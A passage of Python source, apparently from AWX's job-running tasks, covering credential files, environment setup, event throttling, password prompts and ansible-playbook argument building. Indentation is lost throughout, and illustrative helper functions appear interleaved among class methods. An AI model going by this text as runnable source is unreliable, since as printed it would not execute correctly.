# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR)
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('UTF-8')).decode('UTF-8')}}}
authfile.write(json.dumps(auth_data, indent=4))
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
# Using z allows the dir to mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# Ansible runner requires that project exists,
# and we will write files in the other folders without pre-creating the folder
for subfolder in ('project', 'inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=os.path.join(private_data_dir, 'env'))
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
ee_cred = self.instance.execution_environment.credential
if ee_cred:
verify_ssl = ee_cred.get_input('verify_ssl')
if not verify_ssl:
pdd_wrapper_path = os.path.split(private_data_dir)[0]
registries_conf_path = os.path.join(pdd_wrapper_path, 'registries.conf')
host = ee_cred.get_input('host')
with open(registries_conf_path, 'w') as registries_conf:
os.chmod(registries_conf.name, stat.S_IRUSR | stat.S_IWUSR)
lines = [
'[[registry]]',
'location = "{}"'.format(host),
'insecure = true',
]
registries_conf.write('\n'.join(lines))
# Podman >= 3.1.0
env['CONTAINERS_REGISTRIES_CONF'] = registries_conf_path
# Podman < 3.1.0
env['REGISTRIES_CONFIG_PATH'] = registries_conf_path
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
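# Minimal standalone sketch of the resolution rule above (hypothetical helper, assumes
# the same semantics: a non-zero local timeout overrides the global one, and a negative
# local timeout disables the timeout entirely):
def _resolve_timeout(global_timeout, local_timeout):
    timeout = global_timeout if local_timeout == 0 else local_timeout
    return 0 if local_timeout < 0 else timeout
# _resolve_timeout(600, 0) -> 600; _resolve_timeout(600, 120) -> 120; _resolve_timeout(600, -1) -> 0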
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
event_data['job_created'] = self.job_created
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
# To prevent overwhelming the broadcast queue, skip some websocket messages
if self.recent_event_timings:
cpu_time = time.time()
first_window_time = self.recent_event_timings[0]
last_window_time = self.recent_event_timings[-1]
if event_data.get('event') in MINIMAL_EVENTS:
should_emit = True # always send some types like playbook_on_stats
elif event_data.get('stdout') == '' and event_data['start_line'] == event_data['end_line']:
should_emit = False # exclude events with no output
else:
should_emit = any(
[
# if the oldest of the 30 most recent websocket messages was sent over 1 second ago
cpu_time - first_window_time > 1.0,
# if the very last websocket message came in over 1/30 seconds ago
self.recent_event_timings.maxlen * (cpu_time - last_window_time) > 1.0,
# if the queue is not yet full
len(self.recent_event_timings) != self.recent_event_timings.maxlen,
]
)
if should_emit:
self.recent_event_timings.append(cpu_time)
else:
event_data.setdefault('event_data', {})
event_data['skip_websocket_message'] = True
elif self.recent_event_timings.maxlen:
self.recent_event_timings.append(time.time())
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
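# Minimal standalone sketch (assumption: it mirrors the three throttling rules above,
# with recent_event_timings being a collections.deque(maxlen=30) of emit timestamps):
from collections import deque
import time as _time

def _should_emit_ws(recent_event_timings: deque, now: float = None) -> bool:
    if now is None:
        now = _time.time()
    if not recent_event_timings:
        return True
    first, last = recent_event_timings[0], recent_event_timings[-1]
    return any(
        [
            now - first > 1.0,  # oldest message in the window is over a second old
            recent_event_timings.maxlen * (now - last) > 1.0,  # newest is older than 1/maxlen s
            len(recent_event_timings) != recent_event_timings.maxlen,  # window not full yet
        ]
    )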
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# keep self.instance refreshed via the update_model pattern so callback handlers see the latest state
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
self.job_created = str(self.instance.created)
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
res = ansible_runner.interface.run(
project_dir=settings.BASE_DIR,
event_handler=self.event_handler,
finished_callback=self.finished_callback,
status_handler=self.status_handler,
**params,
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
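# Worked example of the path assembly loop above (illustrative, assumes CONTAINER_ROOT
# is /runner, ansible-runner's default project root): with no ANSIBLE_COLLECTIONS_PATHS
# in the environment and no collections_paths in the project's ansible.cfg, the defaults
# are kept and the job-level requirements folder is prepended, yielding roughly:
#
#   ANSIBLE_COLLECTIONS_PATHS=/runner/requirements_collections:~/.ansible/collections:/usr/share/ansible/collections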
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
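# Illustrative sketch (hypothetical job, not real output): for a check-mode job with a
# machine credential for user "admin", become enabled, a become password to prompt for,
# 10 forks and verbosity 2, build_args would return roughly:
#
#   ['--check', '-u', 'admin', '--become', '--ask-become-pass', '--forks=10', '-vv']
#
# ansible-runner later serializes this list into env/cmdline via write_args_file.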
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
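# Illustrative result (hypothetical vault id "prod"): the returned prompt map contains
# entries such as
#   r'Vault password \(prod\):\s*?$'  -> 'vault_password.prod'
#   r'SSH password:\s*?$'             -> 'ssh_password'
# which create_expect_passwords_data_struct later resolves to the concrete password values.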
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
